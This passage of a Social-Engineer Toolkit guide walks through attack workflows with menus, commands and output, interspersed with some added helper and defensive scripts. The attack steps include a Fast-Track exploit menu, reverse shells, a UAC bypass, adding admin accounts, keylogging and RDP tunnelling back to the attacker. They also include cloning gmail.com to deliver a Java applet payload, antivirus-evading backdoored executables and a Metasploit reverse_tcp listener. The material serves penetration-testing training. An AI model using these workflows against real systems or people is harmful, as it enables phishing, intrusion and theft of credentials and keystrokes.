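            continue
        _, session, statement = parts
        for literal in HEX_LITERAL.findall(statement):
            nbytes = len(literal) // 2
            totals[session] += nbytes
            if nbytes >= chunk_bytes:
                flagged.setdefault(session, "single %d-byte hex literal" % nbytes)
        if totals[session] >= session_bytes:
            flagged.setdefault(session, "%d bytes of hex literals across the session"
                               % totals[session])
    return {"totals": dict(totals), "flagged": flagged}


# Constructed audit lines: spid54 stages 300-byte chunks, spid60 is ordinary.
STAGED_CHUNK = "4d5a" * 150  # 300 bytes of a repeated MZ-looking pattern
SAMPLE_AUDIT = [
    "2012-06-27 12:52:01\tspid60\tSELECT name FROM sys.databases",
    "2012-06-27 12:52:02\tspid54\tINSERT INTO stage(part, data) VALUES (1, 0x%s)" % STAGED_CHUNK,
    "2012-06-27 12:52:03\tspid54\tINSERT INTO stage(part, data) VALUES (2, 0x%s)" % STAGED_CHUNK,
    "2012-06-27 12:52:04\tspid54\tINSERT INTO stage(part, data) VALUES (3, 0x%s)" % STAGED_CHUNK,
    "2012-06-27 12:52:05\tspid60\tUPDATE users SET token = 0x0a1b2c3d WHERE id = 7",
    "malformed line without tabs",
]

if __name__ == "__main__":
    result = scan_sql_audit(SAMPLE_AUDIT)
    for session, why in result["flagged"].items():
        print("[!] %s: %s" % (session, why))
```

Both thresholds matter: a single large literal catches a one-shot drop, while the per-session total catches delivery split into chunks small enough to pass a per-statement rule.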

 1) Scan and Attack MSSQL
 2) Connect directly to MSSQL
 99) Return to Main Menu

set:fasttrack:mssql>99

Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing platform. These attack vectors have a series of exploits and automation aspects to assist in the art of penetration testing. SET now incorporates the attack vectors leveraged in Fast-Track. All of these attack vectors have been completely rewritten and customized from scratch as to improve functionality and capabilities.

 1) Microsoft SQL Bruter
 2) Custom Exploits
 99) Return to Main Menu

set:fasttrack>2

Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing Exploits Section. This
menu has obscure exploits and ones that are primarily python driven. This will continue to grow over time.

 1) MS08-067 (Win2000, Win2k3, WinXP)
 2) Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)
 3) Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit
 4) RDP | Use after Free - Denial of Service
 5) MySQL Authentication Bypass Exploit
 6) F5 Root Authentication Bypass Exploit
 99) Return to Main Menu

set:fasttrack:exploits> Select the number of the exploit you want:

SET Interactive Shell and RATTE

One of the newer additions to the Social-Engineer Toolkit is the completely independent SET interactive shell and RATTE: custom-written, independent payloads built into the toolkit. These payloads are only available through the Create a Payload and Listener and the Java Applet Attack vectors. Below are examples of their usage.

*** Pick the number of the shell you want ***

1: 172.16.32.170

Enter your numeric choice: 1

[*] Dropping into the Social-Engineer Toolkit Interactive Shell.

set> ?

Welcome to the Social-Engineer Toolkit Help Menu.

Enter the following commands for usage:

Command: shell
Explanation: drop into a command shell
Example: shell

Command: localadmin <username> <password>
Explanation: adds a local admin to the system
Example: localadmin bob p@55w0rd!

Command: domainadmin <username> <password>
Explanation: adds a local admin to the system
Example: domainadmin bob p@55w0rd!

Command: download <path_to_file>
Explanation: downloads a file locally to the SET root directory.
Example: download C:\boot.ini

Command: upload <path_to_file_on_attacker> <path_to_write_on_victim>
Explanation: uploads a file to the victim system
Example: upload /root/nc.exe C:\nc.exe

Command: ssh_tunnel <attack_ip> <attack_ssh_port> <attack_tunnelport> <user> <pass> <tunnel_port>
Explanation: This module tunnels ports from the compromised victims machine back to your machine.
Example: ssh_tunnel publicipaddress 22 80 root complexpassword?! 80

Command: ps
Explanation: List running processes on the victim machine.
Example: ps

Command: kill <pid>
Explanation: Kill a process based on process ID (number) returned from ps.
Example: kill 3143

Command: exec <command>
Explanation: Execute a command on your LOCAL 'attacker' machine.
Example exec ls -al

Command: bypassuac <ipaddress_of_listener> <port_of_listener> <x86 or x64>
Explanation: Trigger another SET interactive shell with the UAC safe flag
Example bypassuac 172.16.32.128 443 x64

Command: grabsystem <ipaddress_of_listener> <port_of_listener>
Explanation: Uploads a new set interactive shell running as a service and as SYSTEM.
Caution: If using on Windows 7 with UAC enabled, run bypassuac first before running this.
Example: grabsystem 172.16.32.128 443

Command: keystroke_start
Explanation: Starts a keystroke logger on the victim machine. It will stop when shell exits.
Example: keystroke_start

Command: keystroke_dump
Explanation: Dumps the information from the keystroke logger. You must run keystroke_start first.
Example: keystroke_dump

Command: lockworkstation
Explanation: Will lock the victims workstation forcing them to log back in. Useful for capturing keystrokes.
Example: lockworkstation

set> shell

[*] Entering a Windows Command Prompt. Enter your commands below.

set/command_shell>net user dave P@55w0rd! /ADD
System error 5 has occurred.
Access is denied.

set/command_shell>quit

[*] Dropping back to interactive shell...

set> bypassuac 172.16.32.135 443 x64

[*] Attempting to upload UAC bypass to the victim machine.
[*] Initial bypass has been uploaded to victim successfully.
[*] Attempting to upload interactive shell to victim machine.
[*] SET Interactive shell successfully uploaded to victim.
[*] You should have a new shell spawned that is UAC safe in a few seconds...

set> [*] Connection received from: 172.16.32.170

set> quit

[*] Dropping back to list of victims.

*** Pick the number of the shell you want ***

1: 172.16.32.170:UAC-Safe
2: 172.16.32.170

Enter your numeric choice: 1

[*] Dropping into the Social-Engineer Toolkit Interactive Shell.

set> shell

[*] Entering a Windows Command Prompt. Enter your commands below.

set/command_shell>net user dave P@55w0rd! /ADD
The command completed successfully.

set/command_shell>

From the example above, we had one shell connect back to us. If 30 shells connected back to us, you would see a listing of the different IP addresses and shells available to you. In this scenario we ran into a small problem: we were targeting a system that had User Access Control enabled. By initiating the bypassuac flag within the SET interactive shell, we were able to spawn a "UAC Safe" shell on the system and fully compromise it. Conversely, once we have a UAC-Safe shell, we can also leverage the "grabsystem <ipaddress> <port>" command to spawn a shell that is running as SYSTEM on the victim machine. In the next example we'll port forward the victim's remote desktop protocol (RDP) port (3389) from the attacker machine over SSH back to us.

set> ssh_tunnel

[!] Usage: ssh_tunnel <attack_ip> <attack_ssh_port> <attack_tunnelport> <user> <pass> <tunnel_port>

set> ssh_tunnel 172.16.32.135 22 3389 root hackme 3389

[*] Telling the victim machine we are switching to SSH tunnel mode..
[*] Acknowledged the server supports SSH tunneling..
[*] Tunnel is establishing, check IP Address: 172.16.32.135 on port: 3389
[*] As an example if tunneling RDP you would rdesktop localhost 3389

set>

Now all we would need to do on our attack machine is run "rdesktop localhost:3389" to connect to the victim machine. Next, we'll do simple keystroke logging on the victim machine.

set> keystroke_start

[*] Keystroke logger has been started on the victim machine

set> keystroke_dump

this is a test

set>

These are just some of the commands available; you can also upload and download files on the system, add a local admin, add a domain admin, and much more. Simply type "help" or "?" in the interactive shell to test the features out.

RATTE tutorial coming soon.

SET Automation

SET has a feature called "set-automate" which will take an answer file (explained in a second) and enter the commands in the menu mode for you. In the prior walkthroughs you had to step through each menu every time you prepped the attack. So, for example, if I wanted to do the Java Applet I would do this:

Select from the menu:

 1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) SMS Spoofing Attack Vector
 8) Wireless Access Point Attack Vector
 9) QRCode Generator Attack Vector
 10) Powershell Attack Vectors
 11) Third Party Modules
 99) Return back to the main menu.

 set> 2

 The Web Attack module is a unique way of utilizing multiple web-based attacks
 in order to compromise the intended victim.

 The Java Applet Attack method will spoof a Java Certificate and deliver a
 metasploit based payload. Uses a customized java applet created by Thomas
 Werth to deliver the payload.

 The Metasploit Browser Exploit method will utilize select Metasploit
 browser exploits through an iframe and deliver a Metasploit payload.

 The Credential Harvester method will utilize web cloning of a web-
 site that has a username and password field and harvest all the
 information posted to the website.

 The TabNabbing method will wait for a user to move to a different
 tab, then refresh the page to something different.

 The Man Left in the Middle Attack method was introduced by Kos and
 utilizes HTTP REFERER's in order to intercept fields and harvest
 data from them. You need to have an already vulnerable site and in-
 corporate <script src="http://YOURIP/">. This could either be from a
 compromised site or through XSS.

 The Web-Jacking Attack method was introduced by white_sheep, Emgent
 and the Back|Track team. This method utilizes iframe replacements to
 make the highlighted URL link to appear legitimate however when clicked
 a window pops up then is replaced with the malicious link. You can edit
 the link replacement settings in the set_config if its too slow/fast.

 The Multi-Attack method will add a combination of attacks through the web attack
 menu. For example you can utilize the Java Applet, Metasploit Browser,
 Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
 all at once to see which is successful.

 1) Java Applet Attack Method
 2) Metasploit Browser Exploit Method
 3) Credential Harvester Attack Method
 4) Tabnabbing Attack Method
 5) Man Left in the Middle Attack Method
 6) Web Jacking Attack Method
 7) Multi-Attack Web Method
 8) Victim Web Profiler
 9) Create or import a CodeSigning Certificate
 99) Return to Main Menu

 set:webattack> 1

The first method will allow SET to import a list of pre-defined
web applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

[!] Website Attack Vectors [!]

1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu

Enter number (1-4): 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com

[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: 8J5ovr0lC9tW
[*] Malicious java applet website prepped for deployment

What payload do you want to generate:

Name: Description:

1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
9. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
10. Windows Meterpreter Reverse DNS Tunnel communications over DNS and spawn a Meterpreter console
11. Import your own executable Specify a path for your own executable

Enter choice (hit enter for default):

Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.

1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default):

[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.

********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************

Enter choice yes or no: no

Looking through the options, we selected:

1
2
1
https://gmail.com
no

If you put those answers into a text file called moo.txt (or whatever you want), one per line, you can pass it to set-automate and it will enter them for you each time.

root@bt:/pentest/exploits/set# ./set-automate moo.txt

[*] Spawning SET in a threaded process...
[*] Sending command 1 to the interface...
[*] Sending command 2 to the interface...
[*] Sending command 1 to the interface...
[*] Sending command https://gmail.com to the interface...
[*] Sending command default to the interface...
[*] Sending command default to the interface...
[*] Sending command default to the interface...
[*] Sending command no to the interface...
[*] Sending command default to the interface...
[*] Finished sending commands, interacting with the interface..
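The answer-file mechanism shown above is a general one: the answers are typed into a prompt-driven program in order, and a blank line means press enter for the default. The driver below is an added example written for this page, not SET's own set-automate; the moo.txt contents mirror the run above, and the toy menu program it drives is a constructed stand-in for SET so that the whole thing runs offline.

```python
"""Answer-file driver in the style of set-automate: answers are typed into an
interactive, prompt-driven program one line at a time, and an empty line
means "accept the default". Added example, not SET's own code; the answer
file and the toy menu program are constructed for the demo."""
import subprocess
import sys


def parse_answer_file(text):
    """Return the lines to type. Blank lines are kept as '' (press enter for
    the default); lines starting with '#' are comments and are dropped."""
    answers = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#"):
            continue
        answers.append(line)
    return answers


def describe(answers):
    """Log lines in the format set-automate prints before interacting."""
    return ["[*] Sending command %s to the interface..." % (a or "default")
            for a in answers]


def drive(argv, answers, timeout=60):
    """Run argv, feed the answers on stdin, return (returncode, stdout).

    Feeding stdin in one go only works for programs that read their prompts
    from stdin line by line, which is the set-automate model.
    """
    typed = "".join(a + "\n" for a in answers)
    proc = subprocess.run(argv, input=typed, text=True,
                          capture_output=True, timeout=timeout)
    return proc.returncode, proc.stdout


# Constructed answer file: the same sequence the set-automate run above sends.
MOO_TXT = """# Java Applet via site cloner
1
2
1
https://gmail.com



no

"""

# Constructed stand-in for a prompt-driven menu, so the driver can be run here.
TOY_MENU = r'''
import sys
taken = []
for prompt in ("Select from the menu: ", "Enter the url to clone: ",
               "Enter choice (hit enter for default): "):
    sys.stdout.write(prompt)
    sys.stdout.flush()
    taken.append(sys.stdin.readline().rstrip("\n") or "default")
print("chosen:" + ",".join(taken))
'''


def run_toy_demo():
    """Drive the toy menu with three answers and return its final output line."""
    _, out = drive([sys.executable, "-c", TOY_MENU], ["2", "https://gmail.com", ""])
    return out.strip().splitlines()[-1]


if __name__ == "__main__":
    print("\n".join(describe(parse_answer_file(MOO_TXT))))
    print(run_toy_demo())
```

The answer file is as sensitive as the attack it scripts: it records URLs, ports and choices in clear text, so it belongs with the rest of the engagement material and not in a world-readable directory.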
SET Web-Interface

The web interface for the Social-Engineer Toolkit takes whatever you select and generates an answer file that is ultimately passed to set-automate. Each response is assigned a given value and the built-in intelligence on the back-end parses your responses into building and crafting the attack in SET. To turn on the web interface, simply type ./set-web

root@bt:/pentest/exploits/set# ./set-web

[*] Starting the SET Command Center on port: 44444

|                                                      |
|                                                      |
|             The Social-Engineer Toolkit              |
|                    Command Center                    |
|                                                      |
|               May the pwn be with you                |
|______________________________________________________|

 All results from the web interface will be displayed
 in this terminal.

[*] Interface is bound to http://127.0.0.1 on port 44444 (open browser to ip/port)

Once the SET Web Interface is running, browse to localhost:44444. SET will only listen on localhost; you will not be able to get to it remotely.

The web interface should be pretty self-explanatory if you're familiar with the menu mode. One thing to note is that under the updates menu, you'll notice that you can dynamically edit the configuration options. When you save the new settings to the file, it will actually propagate different options in different menus. For example, if you turn self-signed-applets to ON, new options will appear under the web attack menu. Otherwise, the options will remain hidden. To launch an attack, just click on one of the attack vectors, fill out the appropriate fields and hit launch attack. Check the window from which you launched the web interface, and you should see the attack being launched.
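The property that makes the Command Center safe to leave running is the binding: 127.0.0.1:44444 is unreachable from the network only as long as it stays on loopback. The check below confirms that from ss -ltn output. It is an added example and not part of SET; the sample output is constructed, and the live path assumes the ss utility is installed.

```python
"""Check that a management interface such as the SET Command Center is bound
to loopback only. Added example, not SET code. Parses `ss -ltn` output; the
sample below is constructed and the live path assumes `ss` is available."""
import ipaddress
import subprocess


def split_addr_port(field):
    """'127.0.0.1:44444' -> ('127.0.0.1', 44444); '[::]:80' -> ('::', 80); '*:22' -> ('*', 22)."""
    addr, _, port = field.rpartition(":")
    return addr.strip("[]"), int(port)


def parse_listeners(ss_output):
    """Parse `ss -ltn` text into a list of (address, port) for LISTEN sockets."""
    listeners = []
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] != "LISTEN":
            continue  # header line or something that is not a listener
        listeners.append(split_addr_port(cols[3]))
    return listeners


def is_loopback(addr):
    """Wildcards ('*', '0.0.0.0', '::') and non-loopback addresses count as exposed."""
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def exposed_bindings(listeners, port):
    """Return the non-loopback bindings for `port`; an empty list means loopback-only."""
    return [(a, p) for a, p in listeners if p == port and not is_loopback(a)]


# Constructed `ss -ltn` output: SET on loopback, sshd and two web servers exposed.
SAMPLE_SS = """State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       128     127.0.0.1:44444     0.0.0.0:*
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*
LISTEN  0       128     [::]:80             [::]:*
LISTEN  0       128     *:8080              *:*
"""

if __name__ == "__main__":
    live = subprocess.run(["ss", "-ltn"], capture_output=True, text=True).stdout
    exposed = exposed_bindings(parse_listeners(live), 44444)
    for addr, _ in exposed:
        print("[!] port 44444 is reachable on %s" % addr)
    if not exposed:
        print("[*] port 44444 is loopback-only or not listening")
```

Against the constructed sample the check returns nothing for 44444 and reports the wildcard bindings for 22, 80 and 8080. A port that is not listening at all also returns an empty list, so a real deployment check should pair this with a connect test to loopback.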
Frequently Asked Questions

The following answers are intended to avoid confusion and address some of the common questions about SET.

Q. I'm using NAT/Port forwarding, how can I configure SET to support this scenario?

A. Edit the config/set_config file and change AUTO_DETECT=ON to AUTO_DETECT=OFF. Once this option is set, you will be prompted with the following questions:

NAT/Port Forwarding can be used in the cases where your SET machine is
not externally exposed and may be a different IP address than your reverse listener.

Are you using NAT/Port Forwarding? yes or no: yes

Enter the IP address to your SET web server (external IP or hostname): externalipgoeshere

In some cases you may have your listener on a different IP address; if this is the case, the next question asks if your IP address is different for the reverse handler/listener. If that is the case, specify yes, and enter your separate IP address for the listener.

Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address (yes or no): yes

Enter the IP address for the reverse handler (reverse payload): otherexternalipgoeshere

Q. My Java Applet isn't working correctly and I don't get prompted for the Applet when browsing the site.

A. You either do not have Java installed on the victim machine, or you're using a NAT/Port forwarding scenario and you need to change AUTO_DETECT=ON to AUTO_DETECT=OFF. If you view the source of the webpage, the applet should be downloaded from your IP address that is accessible from the victim. In some cases SET may grab the wrong interface IP as well; in this scenario you again will want to edit the set_config and turn AUTO_DETECT to OFF.
Code Signing Certificates

Most recently, Java released an update that hindered the Java Applet attack slightly. In traditional forms of the Java Applet attack you could create a self-signed certificate and manipulate the publisher to show whatever you wanted. A few months back they released an update that showed Publisher: (UNKNOWN) - PUBLISHERNAME. Although a bit of a hindrance, it wasn't bad: if a prominent name was still used, the success ratio was not hindered and the attack vector was still effective.

In the most recent version of Java, it now shows a big "UNKNOWN" under publisher and that is it. This isn't a major showstopper, but it does slightly reduce the success ratio of the attack. To compensate for these changes, the Java Repeater was introduced: if the victim clicks cancel on the applet, the applet prompt is raised again, over and over, until they hit run. This is great, but it wasn't 100 percent.

Introduced in SET v1.4, you can now purchase your own code-signing certificate ($200.00ish) and sign your applet with it. The publisher shown in the prompt is then the name on your certificate rather than UNKNOWN, which gets you back to the attacks from before.

You can create the request and copy and paste the data within the SET menus, or you can do it on your own and then import it into SET. Simply go into the Web Attack vector and select Create or Import a Code Signing certificate. This will replace Signed_Update.jar.orig, which is the template used for all the Java Applet attacks. From then on you will be able to leverage your code-signing certificate within the SET attack vectors.
Developing your own SET modules

Version 1.2 introduced the core library modules and the ability to add third-party modules to SET. Essentially, the "modules" folder in the SET root lets you add additions or enhancements to SET and contribute to the toolkit. The first thing to note is that when you add a new ".py" file to the modules directory, it is automatically imported into SET under "Third Party Modules". Below is an example of a test module (SET at this version is Python 2, hence reload() and raw_input()):

```python
#
# These are required fields
#

import sys

# switch over to import core
sys.path.append("src/core")

# import the core modules
try: reload(core)
except: import core

MAIN = "This is a test module"
AUTHOR = "Dave 'ReL1K' davek@social-engineer.org"

# def main(): header is required
def main():
    # clone the site, build the payload, start the web server and the listener
    core.java_applet_attack("https://gmail.com", "443", "reports/")
    pause = raw_input("This module has finished completing. Press <enter> to continue")
```

In this example we create a simple module that uses the Java Applet attack vector, clones a website and launches the attack for us. It handles creating the Metasploit payloads and everything else. Ultimately you can create whatever you want using the function calls built into SET, or by writing your own. Now if we run SET:
```text
root@bt:/pentest/exploits/set# ./set

 ..######..########.########
 .##....##.##..........##...
 .##.......##..........##...
 ..######..######......##...
 .......##.##..........##...
 .##....##.##..........##...
 ..######..########....##...

 [---] The Social-Engineer Toolkit (SET) [---]
 [---] Written by David Kennedy (ReL1K) [---]
 [---] Version: 1.2 [---]
 [---] Codename: 'Shakawkaw' [---]
 [---] Report bugs to: davek@social-engineer.org [---]
 [---] Follow Me On Twitter: dave_rel1k [---]
 [---] Homepage: http://www.secmaniac.com [---]
 [---] Framework: https://www.social-engineer.org [---]

 Welcome to the Social-Engineer Toolkit (SET). Your one
 stop shop for all of your social-engineering needs..

 DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com

Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Third Party Modules
9. Update the Metasploit Framework
10. Update the Social-Engineer Toolkit
11. Help, Credits, and About
12. Exit the Social-Engineer Toolkit

Enter your choice: 8

Welcome to the Social-Engineer Toolkit Third Party Modules menu.

Please read the readme/modules.txt for more information on how to create your
own modules.

1. This is a test module
2. Return to the previous menu.

Enter the module you want to use: 1

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[*] Digital Signature Stealing is ON, hijacking a legit digital certificate.
[*] Executable created under src/program_junk/ajk1K7Wl.exe
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: m3LrpBcbjm13u
[*] Malicious java applet website prepped for deployment
Site has been successfully cloned and is: reports/
[*] Starting the multi/handler through Metasploit...

 o 8 o o
 8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

 =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 891 exploits - 484 auxiliary - 149 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
 =[ svn r15540 updated 23 days ago (2012.06.27)

resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> use multi/handler
resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set LPORT 443
LPORT => 443
resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
msf exploit(handler) >
msf exploit(handler) >
msf exploit(handler) > exit

This module has finished completing. Press <enter> to continue
```
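The run above shows the discovery mechanism from the outside: a file dropped into modules/ turns into a numbered entry in the Third Party Modules menu, and its main() is what runs when you pick it. The following Python 3 script is an added example, not SET's own loader, that re-implements that behaviour as described on this page (every .py in a modules directory is imported; MAIN, AUTHOR and a main() function are required) and adds the check a module author would want: files missing the required fields are reported and skipped instead of silently ending up in the menu. The sample module text and the temporary modules directory are constructed for the example; SET's real loader and its Python 2 modules may differ in detail.

```python
import importlib.util
import os
import tempfile

# Constructed sample module in the shape of the page's test module.
# It is not a module shipped with SET; main() just returns a marker so the
# result can be checked without running any attack.
SAMPLE_MODULE = '''\
MAIN = "This is a test module"
AUTHOR = "Example author <nobody@example.invalid>"

def main():
    return "module ran"
'''


def load_modules(modules_dir):
    """Import every .py file in modules_dir and keep the ones that carry the
    required fields (MAIN, AUTHOR and a callable main()).

    Returns (loaded, rejected): loaded is a list of (title, author, main)
    tuples in menu order, rejected a list of (filename, reason)."""
    loaded, rejected = [], []
    for name in sorted(os.listdir(modules_dir)):
        if not name.endswith(".py") or name.startswith("_"):
            continue
        path = os.path.join(modules_dir, name)
        spec = importlib.util.spec_from_file_location("thirdparty_" + name[:-3], path)
        mod = importlib.util.module_from_spec(spec)
        try:
            spec.loader.exec_module(mod)       # runs the module's top level
        except Exception as exc:                # a broken module must not kill the menu
            rejected.append((name, "import failed: %s" % exc))
            continue
        title = getattr(mod, "MAIN", None)
        author = getattr(mod, "AUTHOR", None)
        entry = getattr(mod, "main", None)
        if not isinstance(title, str) or not isinstance(author, str) or not callable(entry):
            rejected.append((name, "missing MAIN, AUTHOR or main()"))
            continue
        loaded.append((title, author, entry))
    return loaded, rejected


def menu_lines(loaded):
    """Render the numbered menu the way SET lists third-party modules."""
    lines = ["%d. %s" % (i, title) for i, (title, _, _) in enumerate(loaded, 1)]
    lines.append("%d. Return to the previous menu." % (len(loaded) + 1))
    return lines


def demo():
    """Write the sample module and a module missing its fields into a
    temporary modules directory, load both, and run what was accepted."""
    with tempfile.TemporaryDirectory() as modules_dir:
        with open(os.path.join(modules_dir, "test_module.py"), "w") as f:
            f.write(SAMPLE_MODULE)
        with open(os.path.join(modules_dir, "broken.py"), "w") as f:
            f.write("def main():\n    pass\n")  # no MAIN/AUTHOR: must be rejected
        loaded, rejected = load_modules(modules_dir)
        results = [entry() for (_, _, entry) in loaded]
        return menu_lines(loaded), [name for name, _ in rejected], results


if __name__ == "__main__":
    menu, rejected, results = demo()
    print("\n".join(menu))
    print("rejected:", rejected, "results:", results)
```

Note that importing a module executes its top level, so a third-party module runs code the moment SET lists it; treat the modules directory with the same care as the toolkit's own source.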

The core system files are located under src/core/core.py and can be modified and expanded upon. Here is a list of all of the current function calls supported and their parameters:

core.meta_path() # Returns the path of the Metasploit directory from the set_config

core.grab_ipaddress() # Returns your IP address used for the attacks

core.check_pexpect() # Checks to see if the Python module pexpect is installed

core.check_beautifulsoup() # Checks to see if the Python module BeautifulSoup is installed

core.cleanup_routine() # Removes stale process information, files, etc.

core.update_metasploit() # Updates the Metasploit Framework

core.update_set() # Updates the Social-Engineer Toolkit

core.help_menu() # Displays the help menu

core.date_time() # Displays the date and time

core.generate_random_string(low,high) # Generates a random string whose length falls between low and high. So generate_random_string(1,30) creates a unique string between 1 and 30 characters long

core.site_cloner(website,exportpath, *args) # Clones a website and exports it to a specific path. For example, core.site_cloner("https://gmail.com","reports/") clones the website and exports it to the reports directory

core.meterpreter_reverse_tcp_exe(port) # Creates a meterpreter reverse payload; only the port needs to be specified

core.metasploit_listener_start(payload,port) # Creates a meterpreter listener; only the payload (for example windows/meterpreter/reverse_tcp) and port need to be specified

core.start_web_server(directory) # Starts a web server with the directory you specify as its root, for example core.start_web_server("reports")

core.java_applet_attack(website,port,directory) # Clones a website, creates the meterpreter backdoor, starts a web server and creates the listener. The port is the meterpreter reverse listener port. Example: core.java_applet_attack("https://gmail.com","443","reports/")

core.teensy_pde_generator(attack_method) # Creates a Teensy .pde file you can use for the Teensy USB HID attack vector. You can call the following attack methods: beef, powershell_down, powershell_reverse, java_applet, and wscript. Example: teensy_pde_generator("powershell_reverse")

windows_root() # Grabs the Windows environment root path, for example C:\WINDOWS

upx(path_to_file) # Packs a binary with UPX, which also obfuscates it a bit better